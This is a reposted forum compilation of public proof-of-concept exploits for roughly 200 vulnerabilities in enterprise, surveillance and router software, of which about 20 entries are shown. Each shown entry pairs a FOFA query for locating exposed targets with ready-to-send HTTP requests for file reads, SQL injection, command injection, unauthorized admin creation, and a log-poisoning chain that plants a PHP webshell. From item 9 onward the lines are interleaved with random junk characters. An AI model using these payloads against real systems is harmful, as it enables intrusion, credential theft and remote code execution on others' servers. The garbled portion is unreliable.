Compilation of publicly disclosed internet vulnerabilities, 202309-202406 (repost)
Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed internet vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive security, and we hope this article helps with defence. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024, all taken from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Patches: all the vulnerabilities listed are public; for patches or remediation, contact the product vendor.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the backend to have the relevant content removed.

Notice

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT management platform arbitrary file read
21. 大华ICC intelligent IoT management platform random remote code execution
22. 大华ICC intelligent IoT management platform log4j remote code execution
23. 大华ICC intelligent IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social business ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD licence plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA :title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA :title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA :title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA :title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA:icon_hash="-1344736688"
After logging into the backend with the default admin account, perform the following
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=cookie obtained in the login step
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword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
( u& i3 l+ |6 T! l# fHost: x.x.x.x
. K2 L! b/ ^' k2 B- @! N5 o' L0 b! d9 I4 B2 c8 X9 M% A
2 s7 T+ W  _, N1 K, W
payload为下列语句的二次Url编码
' c; R/ l- h; y+ y4 O! i
, S2 S( x2 H8 i$ x. S' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
+ t- {" z  ?4 j& M2 C( |& Q0 m5 T) t' j( f  F2 p4 |: M6 V
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
( t9 u0 [! t; \: Z" t6 B; OFOFA:icon_hash="953405444"$ \* H& Z8 \0 f0 B7 `1 {# Z

+ g) W3 N6 }5 ]% \文件上传后响应中包含上传文件的路径
! h6 z# M2 N: E7 @: {POST /eis/service/api.aspx?action=saveImg HTTP/1.10 S3 ^  M/ n" [6 e- g1 C
Host: x.x.x.x:xx
& }1 s) y- t0 Y* U+ h' E$ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# Q9 C1 v) W. e' |- ~$ g& MContent-Length: 197
2 h2 q8 U9 I6 x% OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ ~1 W' E3 w/ U  E# K0 _7 XAccept-Encoding: gzip, deflate
3 G4 a4 U1 K- z/ ^' qAccept-Language: zh-CN,zh;q=0.9. Z9 v/ A  ]! |% n# y7 h$ j
Connection: close
  S6 T+ j- i3 @  i" W2 cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
5 b* m$ f& q7 `5 j3 v# S2 T6 p1 M2 ?
------WebKitFormBoundaryxdgaqmqu# L5 |5 k( k6 @
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
; N& L$ \. i: a" _$ I7 \- IContent-Type: text/html0 E: o( u) D0 b- _4 t
  q8 m% s6 f/ Y2 F6 W+ ?* I. d
jmnqjfdsupxgfidopeixbgsxbf
) C0 E: @) N/ }3 w7 d1 c) Q& q------WebKitFormBoundaryxdgaqmqu--
& h1 F3 [" i! c: L* `
. x7 M5 G7 W0 K0 }7 _  c& ~: _9 G0 f, E
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# X4 s, h/ W9 H, \! x. ~# BFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"6 O. ^5 C& Y) {8 t+ p, F
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
+ t1 D: b9 ?! s2 d5 M% QHost: 127.0.0.14 r3 N/ B. {  _
Pragma: no-cache
$ a0 ~$ X% X- U  v" e0 Q2 ~9 rCache-Control: no-cache
7 ?- r  Q1 |3 z+ ~Upgrade-Insecure-Requests: 1
  J$ D4 i9 O9 k3 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: [* `! r5 T# l4 I/ M1 ~" WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* _; n5 p0 ^/ ]' @/ o- OAccept-Encoding: gzip, deflate1 n* C8 i: x* U% g2 ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8/ F8 f$ \% c1 o. T+ f
Connection: close$ B* R! n4 Z: _+ V% ?- A
4 ]  S  t# j) S& F0 O7 {  W
; s7 l* L* [% V0 \6 j4 M$ g
12. Jorani < 1.0.2 远程命令执行
0 i4 ^' b" K: ]5 T. F# f, WFOFA:title="Jorani"
5 D5 |( D. Z4 Z第一步先拿到cookie. c& I) o! h3 A) F( @- S0 ]
GET /session/login HTTP/1.1
9 f3 W0 \# R. {1 ]9 m* tHost: 192.168.190.30
- s4 S4 B, X! s1 v% {0 u' eUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36: A  n) M$ V* T  b9 w
Connection: close3 z8 |$ i+ ~: b. J( F
Accept-Encoding: gzip
  Y6 n. G3 j% h6 Y# n% [6 m4 m! O( y" `0 I) [
. N0 `" W" a, u9 X
响应中csrf_cookie_jorani用于后续请求
8 O0 w$ o- `$ n% {HTTP/1.1 200 OK' A) T" ?0 s( b( h* ?5 K3 i
Connection: close
; W5 Q9 Z0 b7 E' e* \Cache-Control: no-store, no-cache, must-revalidate: f6 Z9 L1 M" _$ g) ~2 p
Content-Type: text/html; charset=UTF-8! k6 ?. J9 U0 f, [) p
Date: Tue, 24 Oct 2023 09:34:28 GMT
+ O- Z: G# y' U* v. i/ QExpires: Thu, 19 Nov 1981 08:52:00 GMT* \) y% U. X/ T& O9 ]% S7 ~
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
* }8 I( v$ s5 j2 ?. P  z/ \Pragma: no-cache) r: y( {% G! d- R1 V) ^5 P* Y
Server: Apache/2.4.54 (Debian)
( t3 z% }; B# q) ISet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/' p3 i, {! _! Z8 h4 V
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
* s# \/ Y1 `9 l) G- _# QVary: Accept-Encoding
  P5 j) u* f  I. q4 d" S
8 [* H+ J7 N7 j# r9 U3 M9 I
3 ^% `* k; U* rPOST请求,执行函数并进行base64编码' |2 A% T: h6 D  M0 h* L: i
POST /session/login HTTP/1.1
- x, E/ ]+ h1 i/ r  C! ~. BHost: 192.168.190.30
' o# r% Q3 z1 w* |& w* b: GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( L9 k9 |6 m( [: _2 k0 NConnection: close0 Q5 O# b. j6 x+ I+ d+ R$ \0 s, V/ O4 P
Content-Length: 252
/ d$ s1 {$ X# s  Y2 y. N# Y6 M8 TContent-Type: application/x-www-form-urlencoded
: ~# x# Y1 M4 V, b8 @7 OCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
! V! w9 c" V+ s: c- kAccept-Encoding: gzip
: V$ L# {/ l3 w' A+ Z6 ^( c) k
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
) Y$ m$ y5 m2 N9 N1 g% {3 F/ n& R
. u1 o3 @9 |9 m( y
- ?1 ]  _. j  L: |: x8 f' V9 V3 j* w' Z$ i6 |. T
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
: B7 |/ B* {, d8 BGET /pages/view/log-2023-10-24 HTTP/1.1# `8 Z  [5 y3 A) S2 {$ q' s* K
Host: 192.168.190.30; Y2 w3 y$ g( n9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. l* G3 f. h; \/ lConnection: close
0 u2 u  @+ [0 ^( E: P, B; iCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
# J* S/ j% l  b+ {6 i4 _K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=7 ], |1 P7 V7 F( ^" o; o
X-REQUESTED-WITH: XMLHttpRequest
: q5 B4 x- T2 f7 kAccept-Encoding: gzip( |' O# {+ _! Q& z: h: h

5 |! V* g) q7 \, n8 r& z$ z  Q* g  B, I& K, n9 M" k
13. 红帆iOffice ioFileDown任意文件读取6 ]3 M, l4 u, E6 s8 F
FOFA:app="红帆-ioffice"+ X2 [9 g. ~" p* K" N
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
" J; S- p, J1 x* s3 J! tHost: x.x.x.x2 D, S4 v( y  M4 p2 B5 p* d; K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* q/ T. C0 A2 P, P0 n9 W$ JConnection: close
& @3 P3 {* s3 [6 S: DAccept: */*
6 q, b8 S* S% g2 MAccept-Encoding: gzip& @7 R) B; N/ |# ^9 d9 D
+ ]& e* B1 P* C7 N7 O0 H8 D

* |; A: I, v5 [8 Z4 u7 b14. 华夏ERP(jshERP)敏感信息泄露
: q* M4 V5 x# HFOFA:body="jshERP-boot"
# }& ~+ t2 s7 B2 n* {泄露内容包括用户名密码, Q8 n( U' w& y% V% S2 J  l
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
4 U) V, Z8 d& {5 O5 WHost: x.x.x.x2 J/ K8 i: |) M! [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. Y* Z/ T5 a( i) Z- AConnection: close
0 C5 y  }% g+ L. ]Accept: */*/ G! P1 h. R/ P0 y
Accept-Language: en$ ~, p! H" @  c2 n
Accept-Encoding: gzip8 Q  h+ J* L7 @' L9 V: H; |

* W6 G1 @2 |, a( l8 i7 S+ g, }; Z6 X4 |. t$ z
15. 华夏ERP getAllList信息泄露
' k( b# t) k3 d) PCVE-2024-0490; g# k& W; n- T' e4 d
FOFA:body="jshERP-boot"
: W! M' J3 k( s* q$ D) S3 G泄露内容包括用户名密码  q# z+ G" _5 J$ ~) ?. a
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1! v8 a: Y3 }* n* Y/ H3 ?2 q5 k
Host: 192.168.40.130:100; q& k! I9 y5 j* G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" Z9 |' T5 Z* ?  dConnection: close: n5 v, ^1 h& |2 ^
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
1 b* s6 g, n, ]$ p  y+ fAccept-Language: en& O$ T4 \& S$ W" D
sec-ch-ua-platform: Windows
2 x4 Z7 x$ K, X: R3 Y6 o4 RAccept-Encoding: gzip; u" _* o7 J5 }; M
3 i: E- r" }. p- c& [6 p+ S/ v) y: x1 x

9 M3 G) G4 n) |( ]  U16.  红帆HFOffice医微云SQL注入$ S4 z! D$ _8 U% ^1 c- x
FOFA:title="HFOffice"
  r( e, c/ L5 k$ G1 hpoc中调用函数计算1234的md5值
" i6 _! X- H5 b  |; T! fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1  Z1 `  W% Q. `0 `! a9 x* T
Host: x.x.x.x
) e0 \! D: f, n4 rUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) V/ z4 N: l7 ?  S( d$ g
Connection: close
/ Y/ E$ d# ~3 `$ l: I2 R" m# bAccept: */*
! q# C% i+ L0 [Accept-Language: en3 h8 T; K+ `. F8 [0 ?" F, x
Accept-Encoding: gzip
6 X) r1 ?7 b: k7 @, o8 ~; c1 P6 p6 u7 C8 g9 o

, U* x# D; g# g3 i17. 大华 DSS itcBulletin SQL 注入. p5 _' T& {6 d* ^9 R- p1 q
FOFA:app="dahua-DSS"* p% I5 v1 s% B
POST /portal/services/itcBulletin?wsdl HTTP/1.1
( h! |1 q' e( F7 p4 _5 W3 o9 ~) O* j! DHost: x.x.x.x
! o* R2 z8 ^' b. ^1 f1 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! v6 s' s0 @8 @Connection: close7 ?" {" w: f" m$ d2 e% g& T
Content-Length: 345# n& w* w5 R" {7 ]' z4 Q
Accept-Encoding: gzip
  L7 ~: _& K% q. F( A. D
* u) J. }2 Y' k8 z! d! F- B<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
# }- M# p6 I% F4 u# H2 y<s11:Body>
1 v6 f5 T$ H9 |. c+ I    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>+ n& {* ~8 m% F% J
      <netMarkings>
* n6 b% l. f) |* m       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( E# L# e1 h) p9 w" A5 p9 _& t      </netMarkings>; M0 O& G& r5 I5 x& [- _
    </ns1:deleteBulletin>. }! N6 t1 P* u% v+ Q
  </s11:Body>
( c: l% p0 u+ T7 i3 Z# x5 S: ~2 g1 [: h</s11:Envelope>
3 {" J) O& Q$ e* W
( V* t% S; g9 c+ ^. J) k3 T
0 K- H, r' o! B" ~18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( Y- ?4 H1 w. E9 p# j) Y8 w
FOFA:app="dahua-DSS"
' x4 [( f2 b+ \6 r9 m2 K1 zGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1% U  }9 T' K; s; U; b
Host: your-ip+ {' V) B0 o8 `: O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( @% {6 s* U: Q! Y: V
Accept-Encoding: gzip, deflate6 X* ~4 {3 @; {( S  p
Accept: */*
& g' u! o& L+ G+ [3 M  d+ @. A! dConnection: keep-alive  I7 K" Y. ?# y2 k5 @: u
/ g7 R* @3 w; x$ v

, r+ i7 g5 e9 v* _: ?/ w% m( N
% t8 e5 i1 I; I0 |19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
& C5 @2 U6 A+ p6 @FOFA:app="dahua-DSS"
" E1 O  H# j) E7 MGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
, S- x! a* |3 I- BHost:
  @7 O( b3 q' ?$ ]# U2 zUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 A7 G) q( _9 A/ U
Accept-Encoding: gzip, deflate
5 U0 Y% |$ J% r% v' @Accept: */*
* t7 O  \/ ]+ a2 J2 k* h( V( TConnection: keep-alive
1 A# J5 R. |. I/ b" R
3 D7 N: f3 {) r7 W6 Q1 x2 ]" J$ z  B
( b/ y* i# y5 T) q% Y20. 大华ICC智能物联综合管理平台任意文件读取
" {2 u+ p# \- [5 G9 JFOFA:body="*客户端会小于800*"; D' @% @7 w" W3 z; L: `/ \, L" I) `
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1' w" ]5 t. T: _; v: P1 z
Host: x.x.x.x
